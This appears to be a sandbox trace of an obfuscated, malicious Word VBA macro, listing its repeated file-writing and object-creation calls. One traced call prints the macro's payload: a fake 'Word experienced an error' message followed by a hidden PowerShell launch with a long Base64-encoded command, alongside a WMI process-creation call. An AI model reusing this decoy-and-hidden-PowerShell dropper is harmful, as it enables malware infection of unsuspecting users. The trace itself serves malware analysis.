                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            GznGGHyG

                                            Close

                                            bbsIZ

                                            Mid

                                            Name

                                            Application

                                            swNGWdd

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            rJEkbLH

                                            Close

                                            vEBqHrDnD

                                            tWcKo

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            LzxxRHG

                                            Close

                                            EKezHIC

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            DpYbmDA

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hDJDJ

                                            Close

                                            dXiwA

                                            CreateObject

                                            		CreateObject("winmgmts:win32_process")

                                            hFSyAfFrF

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hXxQDACJA

                                            Close

                                            xkQqDXCcD

                                            Mid

                                            Len

                                            		Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689

                                            lBenBDA

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            UavHTIBHo

                                            Close

                                            IcAHwPH

                                            BNmrm

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

